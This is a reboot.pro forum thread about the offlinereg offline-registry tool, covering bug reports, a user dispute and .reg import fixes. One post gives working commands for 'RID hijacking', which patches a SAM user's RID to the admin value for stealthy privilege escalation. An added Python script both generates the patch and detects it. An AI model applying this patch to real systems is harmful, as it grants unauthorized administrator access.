Posted 17 March 2019 - 03:11 PM
You forgot to fix this one. Leftovers.
Edit: It seems to work fine.
Also reg.exe cannot be a replacement because it doesn't ignore permissions.
Edited by osfixer, 17 March 2019 - 03:21 PM.
Posted 19 March 2019 - 03:19 PM
What you could also do is add support for adjusting permissions for keys and values.
This could be done only through command line I think.
Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?
If it doesn't you can add /inherit switch..
DWORD ORAPI ORGetKeySecurity (
    _In_ ORHKEY Handle,
    _In_ SECURITY_INFORMATION SecurityInformation,
    _Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
    _Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD ORAPI ORSetKeySecurity (
    _In_ ORHKEY Handle,
    _In_ SECURITY_INFORMATION SecurityInformation,
    _In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);
Edited by osfixer, 19 March 2019 - 03:25 PM.
Posted 24 March 2019 - 02:33 PM
Following a post here on how to blank an account's password using offlinereg, this time let's see how to perform "RID hijacking".
The local admin account has a RID of 01F4.
What about "patching" another (non-admin) account to replace its RID with 01F4?
rem notice the RID at offset 30h (here E803, i.e. 0x3E8 = 1000 stored little-endian, matching the key name 000003e8)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f
rem let's write F401 (admin RID 0x1F4, little-endian) at offset 30h (48 in decimal form): byte 244 at offset 48, byte 1 at offset 49
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49
Now you should be able to restart your system, log in with this user account and actually perform admin tasks.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.
LSASS trusts SAMSRV and SAMSRV trusts the registry: everyone is happy...
This can work with the guest account as well.
I tested this with success from a winpe against windows 10.
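As an added example (not erwan.l's code and not part of offlinereg), the following Python shows both sides of the technique described above: it reads and rewrites the RID field at offset 30h of a user's F value, emits the equivalent offlinereg setvaluebyteat lines, and, for the defender, flags any user whose key name (the RID in hex) disagrees with the RID inside its F value, which is exactly what the patch leaves behind. The F blob is constructed (zero-filled except for the RID field); the hive path, key name and command syntax are taken from the post. Treating the field as a 32-bit little-endian DWORD is an assumption, consistent with the two low bytes the post patches.

```python
import struct

# Layout used below: the SAM user subkey name is the RID in hex
# (000003E8 = 1000) and the F value stores that same RID at offset 30h.
# The field is treated as a 32-bit little-endian DWORD (assumption: the
# post patches only its two low bytes, which is consistent with that).
F_RID_OFFSET = 0x30
ADMIN_RID = 0x1F4  # 500, the built-in Administrator RID

# Constructed sample F value for a user with RID 1000: zero-filled apart
# from the RID field. A real F value carries many more fields.
SAMPLE_F = bytes(F_RID_OFFSET) + struct.pack("<I", 0x3E8) + bytes(0x1C)


def read_rid(f_value):
    """RID stored at offset 30h of an F value (little-endian DWORD)."""
    if len(f_value) < F_RID_OFFSET + 4:
        raise ValueError("F value too short to hold a RID")
    return struct.unpack_from("<I", f_value, F_RID_OFFSET)[0]


def hijack_rid(f_value, new_rid=ADMIN_RID):
    """Copy of f_value with the RID field rewritten (the 'patching' the post describes)."""
    patched = bytearray(f_value)
    struct.pack_into("<I", patched, F_RID_OFFSET, new_rid)
    return bytes(patched)


def setvaluebyteat_commands(hive_path, key_name, f_value, new_rid=ADMIN_RID):
    """offlinereg 'setvaluebyteat f <byte> <offset>' lines equivalent to
    hijack_rid(): one line per byte of the RID field that actually changes."""
    patched = hijack_rid(f_value, new_rid)
    cmds = []
    for off in range(F_RID_OFFSET, F_RID_OFFSET + 4):
        if patched[off] != f_value[off]:
            cmds.append(
                ('OfflineReg-win32 "%s" sam\\domains\\account\\users\\%s '
                 "setvaluebyteat f %d %d") % (hive_path, key_name, patched[off], off)
            )
    return cmds


def find_hijacked(users):
    """Detection side: users whose key name (RID in hex) disagrees with the RID
    inside their F value. Input: {key_name: f_value_bytes}. Output: list of
    (key_name, rid_from_name, rid_in_f) for each mismatch."""
    hits = []
    for key_name, f_value in users.items():
        from_name = int(key_name, 16)
        in_f = read_rid(f_value)
        if from_name != in_f:
            hits.append((key_name, from_name, in_f))
    return hits


if __name__ == "__main__":
    hive = r"c:\windows\system32\config\SAM"
    print("RID in sample F: 0x%X" % read_rid(SAMPLE_F))
    for cmd in setvaluebyteat_commands(hive, "000003e8", SAMPLE_F):
        print(cmd)
    print("mismatches:", find_hijacked({"000003e8": hijack_rid(SAMPLE_F)}))
```

Run against a real hive, find_hijacked() would be fed the F value of every subkey under SAM\Domains\Account\Users (skipping the Names subkey); a non-empty result is the indicator the post calls "stealthy", since group membership alone will not show it.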
Posted 24 March 2019 - 02:55 PM
This can work with the guest account as well.
Nice
And once again all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").
Wonko
[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it
Posted 24 March 2019 - 03:04 PM
Nice
And once again all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").
Wonko
[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it
Absolutely agree.
BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type the BIOS password, but it is perfectly valid in a home environment.
Disk encryption like BitLocker addresses a lot of these "local" attacks, although I feel BitLocker could shortly be broken without even having to get the key from the TPM chip...
Posted 24 March 2019 - 03:12 PM
BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type this password, but it is perfectly valid in a home environment.
I don't see how you can ask a user to remember his Windows login password[1] but not the BIOS one in a corporate environment.
Wonko
[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services
[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.
Posted 24 March 2019 - 03:21 PM
I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.
Wonko
[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services
[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.
I work in a big corp environment and it is already a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first name, x letters for last name, etc.), thus regularly witnessing users who forget their username because it is so cryptic.
And then an 8+ character password which has to include digits AND non-alphanumeric chars, with a policy preventing the reuse of the last 16 passwords...
That alone is enough to keep dozens of IT ppl busy every day
I can see the massive nervous breakdown it would be if we were to ask them to remember the computer BIOS password.
Now, on the good side, in big corp environments, SSO/delegation makes it so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall thus: if the user credentials get compromised, all apps get compromised...
Security is a never ending discussion.
I like to play the red team sec guy - I really would not want to be a blue team sec guy
Posted 24 March 2019 - 03:33 PM
That alone is enough to keep dozens of IT ppl busy every day
I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):
Usual activities of IT people I know:
1) Saying NO, it is NOT possible to whatever request
2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.
3) In all other cases do something (usually trivial) and make it seem like it is:
a. difficult
b. possibly very, very difficult
c. even better, very, very difficult AND tiring
Wonko
Posted 24 March 2019 - 03:45 PM
I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):
...
Sounds like you have had bad experiences with IT departments
Running an IT dept, I have a different experience.
A good dept will be organised in different levels using ITIL processes and based on a service catalog with SLAs:
-level 1 facing users with one task: solve the issue/address the request in less than 30 mins max, with an objective of 60% of all tickets solved in L1
-level 2 specialised in different fields (networks, systems, etc.), mainly focusing on more complex requests, with an objective of 30% of all tickets solved in L2
-level 3 specialised in a field (network for example) AND a platform/solution (Checkpoint/Fortigate/etc.), liaising with vendors/editors if it really needs to
Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient manner.
Now I am more into IT Ops and I appreciate that addressing new needs, especially around apps, is quite different and possibly deals more with project management.
My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do, which leads to nice discussions
Now, maybe we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive
Posted 24 March 2019 - 04:04 PM
My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do, which leads to nice discussions
So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right .
Your particular IT department is then definitely the exception that confirms the rule.
Now, maybe we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive
Agreed
Wonko
Posted 29 March 2019 - 06:11 PM
Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.
offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg
[ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
main error:Access violation

secpol.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
"Machine"=""
; Network access: Remotely accessible registry paths (None).

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths]
"Machine"=""
; Network access: Remotely accessible registry paths and subpaths (None).
Edited by osfixer, 29 March 2019 - 06:21 PM.
Posted 29 March 2019 - 06:54 PM
Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.
Good news for you is that you don't have to use it: life is good!
It is not as if I had not warned you several times that I have put little effort into the import command and that you should prefer reg load/unload for this specific matter...
Posted 29 March 2019 - 06:55 PM
So you are intentionally not fixing bugs? That is really weird.
Posted 29 March 2019 - 06:56 PM
So you are intentionally not fixing bugs? That is really weird.
Not exactly.
I am intentionally defining my priorities.
Nothing weird there: I believe all human beings do so.
Posted 29 March 2019 - 06:58 PM
That is a bad excuse, telling people not to use your tool.
But then again I am not surprised considering..
Edited by osfixer, 29 March 2019 - 06:58 PM.
Posted 29 March 2019 - 07:01 PM
That is a bad excuse, telling people not to use your tool.
But then again I am not surprised considering..
Lets stop the discussion there.
You don't like the tool? You know of other tools? All fine with me.
I am not asking for any credit but at the same time I will not accept negative comments, nor will I try to decrypt your understatements.
You have been gently warned.
Don't spoil my fun.
Posted 29 March 2019 - 07:04 PM
Instead of saying thanks for discovering your bugs in your software, you are now saying sorry can't do. Heh.
Posted 30 March 2019 - 02:06 PM
@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude. He creates tools for us to use for free out of kindness; he has a job to do like all of us, so can only devote limited time to these projects. Why not just be grateful for what he does? If it doesn't do what you want then use something else. All of us here on this forum appreciate the work others do, and understand it is a hobby or side project; we don't demand fixes and then get stroppy when we don't like the answers. Perhaps take your attitude elsewhere.
@erwan.l - I personally thank you for all you do, and use some of your tools such as this which work well for me, I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with
Posted 25 April 2019 - 09:11 PM
Posted 29 April 2019 - 05:56 PM
Hey Misty,
Long time no see
Thanks for your kind words !
No worries: I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) and as long as I can remember I have encountered "challenging" behaviors...
Thus, I am still there and having fun and I am planning on making it another 25 years (at least!).
Think about it, Wonko has been there since DOS 3.1 (if not VAX/VMS) and he is still this charming guy we know of
If he can do it, I can do it
About versioning, well hopefully Wonko misses that post and does not comment on that one (...) but there is some hope: I am currently migrating as much code as possible to Lazarus/FreePascal and this new IDE gives me some more capabilities there.
In short, all binaries should see the build number increase automatically, and the software should also display the build number automatically (getting it from the binary itself) - example here with vmount (lately migrated from Delphi 7 to FPC).
I will also stick to a version.txt containing some extra binary details.
And I may even go as far (as some other dev guys on this forum) as including the build number in the filename.
It could be a good idea to define our own standards here on this forum in a dedicated post.
There are some great experienced guys on this forum who could share their views there.
Regards,
Erwan
Posted 29 April 2019 - 07:46 PM
No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) a
Yeah, definitely kids today :
https://tinyapps.org..._in_my_day.html
About versionning, well hopefully, Wonko miss that post ...
... after 25 years are you still grasping at straws logical impossibilities?
and not comment on that one (...) but there is some hope
By pure chance, Wonko happens to be in exceptionally good mood today thus your request is exceptionally granted [1].
Wonko
[1]but this of course doesn't exclude the matter from future conversations on the public park bench
Posted 16 December 2019 - 09:18 PM
Just to let you know my findings with this fantastic tool from erwan.l
It works fine from the full OS or from a WinPE. In order to run some tests with it, from my full Win 7 x64 I mounted, by means of DismMountService, an old boot.wim from my 7pe_amd64_E to the C:\temp folder; the idea was to copy wofadk.sys into the Windows\System32\drivers folder and install the service to run wofadk.sys when booting from the WinPE.
This is the reg file for wofadk.sys:
Then I just copied the mentioned file to the required location, and from an elevated command prompt opened in the same folder where offlinereg-win64 and WofAdk.reg are located, ran this command:
offlinereg-win64 "C:\temp\Windows\System32\config\system" "D:\Aplicaciones\offlinereg\WofAdk.reg" import WofAdk.reg
EDIT-1: It is better to use: offlinereg-win64 "C:\temp\Windows\System32\config\system" " " import WofAdk.reg
And it did its magic and all the reg was applied to the mounted boot.wim. Then, just to make sure all was done fine, I opened the C:\temp\Windows\System32\config\system file with Offlinereg_Gui.exe and to my surprise all was copied from the reg file but the part related to:
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
00,2e,00,73,00,79,00,73,00,00,00
was not copied fine (maybe too long), as you can see in the attached pictures; all that is only to say in hexadecimal = system32\DRIVERS\wofadk.sys
But by means of the GUI it was very easy to delete the last two lines and edit the ImagePath value to system32\DRIVERS\wofadk.sys, then just save and that was all; of course I reopened it to verify the changes were done.
Then just dismounted the boot.wim committing changes.
To summarize:
EDIT-2: (1) The cause of this issue was found by erwan.l, and there is an easy way to avoid it see:
From: http://reboot.pro/to...-13#entry213675
I believe the issue is either with crlf and/or the ucs-2 format (your file has "magical" chars $fffe at the start of the file which you can see in a hex editor).
Copy paste the below to fresh new text file and try again to exclude the ucs-2 issue (i.e do not use the reg file generated by regedit).
And my test using this recommendation: http://reboot.pro/to...-13#entry213678
And all worked fine, see attached picture, so this means we can't use reg files generated by regedit, or we need to do some trick to them before using; please explain.
And the next test: http://reboot.pro/to...-13#entry213679
Answering myself: (after just testing the following)
If we copy the content of a reg file generated by regedit.exe to a new text file and then save it as xxxxx.reg, then it can be used without any problem on Offlinereg.
Then only to summarize: The reg import feature is working fine, when using the fixed reg file.
alacran
Edited by alacran, 21 December 2019 - 11:35 PM.
Issue fixed
Posted 16 December 2019 - 10:08 PM
Now my old 7pe_amd64_E is capable of applying, by means of WinNTSetup, the WIM (Index:X) image files in Wimboot or Compact mode, without the need to rebuild it, as proved by the attached picture, where we can see the wofadk service is running.
alacran
Posted 17 December 2019 - 09:04 AM
Try using the hex string without the \ (which means "new line" in .reg files but is not accepted normally in command line).
I.e. this:
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
00,2e,00,73,00,79,00,73,00,00,00
may not work, but this:
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,00,2e,00,73,00,79,00,73,00,00,00
should.
Wonko
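As an added example (not part of the original posts and not offlinereg's own code), here is a small Python .reg reader that copes with both points raised above: the UTF-16 LE byte order mark that regedit exports carry (the $fffe bytes erwan.l mentions) and the trailing-backslash line continuation that Wonko describes for long hex(2) data. The sample export is constructed; the service key and its Type value are illustrative, while the ImagePath bytes are those quoted in alacran's post and decode to system32\DRIVERS\wofadk.sys. normalize_for_offlinereg() rewrites such an export into the BOM-free, single-line form that alacran found to import cleanly.

```python
import codecs
import re

# Constructed sample in the shape regedit.exe exports: UTF-16 LE with a BOM
# (the $fffe bytes mentioned in the thread), CRLF line ends, and a hex(2)
# value wrapped onto three lines with trailing backslashes.
REGEDIT_EXPORT = codecs.BOM_UTF16_LE + (
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WofAdk]\r\n"
    '"Type"=dword:00000001\r\n'
    '"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\\\r\n'
    "  52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\\\r\n"
    "  00,2e,00,73,00,79,00,73,00,00,00\r\n"
).encode("utf-16-le")

VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')
HEX_RE = re.compile(r"^hex(?:\((?P<type>[0-9a-fA-F]+)\))?:(?P<bytes>.*)$")


def decode_reg_text(raw):
    """Text of a .reg file, whether it is a UTF-16 LE BOM export or plain 8-bit text."""
    if raw.startswith(codecs.BOM_UTF16_LE):
        return raw[len(codecs.BOM_UTF16_LE):].decode("utf-16-le")
    if raw.startswith(codecs.BOM_UTF8):
        return raw[len(codecs.BOM_UTF8):].decode("utf-8")
    return raw.decode("utf-8", errors="replace")


def join_continuations(text):
    """Merge lines ending in a backslash with the following line(s); leading
    blanks on continuation lines are dropped, so hex(...) data becomes one line."""
    lines, buf = [], None
    for line in text.splitlines():
        piece = line.strip() if buf is not None else line.rstrip()
        if piece.endswith("\\"):
            buf = (buf or "") + piece[:-1]
            continue
        lines.append((buf or "") + piece)
        buf = None
    if buf is not None:
        lines.append(buf)
    return lines


def decode_value(data):
    """(type name, decoded data) for the value syntaxes found in exports."""
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return ("REG_SZ", data[1:-1].replace('\\\\', '\\').replace('\\"', '"'))
    if data.startswith("dword:"):
        return ("REG_DWORD", int(data[6:], 16))
    m = HEX_RE.match(data)
    if m is None:
        raise ValueError("unsupported value data: " + data)
    reg_type = int(m.group("type"), 16) if m.group("type") else 3
    raw = bytes(int(b, 16) for b in m.group("bytes").split(",") if b.strip())
    if reg_type == 2:  # REG_EXPAND_SZ: UTF-16 LE, NUL-terminated
        return ("REG_EXPAND_SZ", raw.decode("utf-16-le").rstrip("\x00"))
    if reg_type == 7:  # REG_MULTI_SZ: NUL-separated strings, double-NUL terminated
        return ("REG_MULTI_SZ", [s for s in raw.decode("utf-16-le").split("\x00") if s])
    return ("hex(%x)" % reg_type, raw)


def parse_reg(text):
    """{key path: {value name: (type, data)}} for the text of a .reg file."""
    keys, current = {}, None
    for line in join_continuations(text):
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            raise ValueError("unparsed line: " + line)
        keys[current][m.group("name")] = decode_value(m.group("data"))
    return keys


def normalize_for_offlinereg(raw):
    """Rewrite an export into the form that worked in the thread: no UTF-16 BOM
    and no backslash continuations (every value on one line). The sample is
    pure ASCII, so the 8-bit output is byte-identical to an ANSI file."""
    text = decode_reg_text(raw)
    return ("\r\n".join(join_continuations(text)) + "\r\n").encode("utf-8")


if __name__ == "__main__":
    for key, values in parse_reg(decode_reg_text(REGEDIT_EXPORT)).items():
        print(key)
        for name, (reg_type, data) in values.items():
            print("  %s (%s) = %r" % (name, reg_type, data))
    print(normalize_for_offlinereg(REGEDIT_EXPORT).decode("utf-8"))
```

The two transformations are independent: a file can be BOM-free yet still wrap its hex data, or be UTF-16 with every value on one line, so a pre-import check should test for both before handing the file to a tool that, as this thread shows, may not cope with either.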
Posted 17 December 2019 - 05:44 PM
Thanks Wonko I will try it the way you suggested and report back my findings.
alacran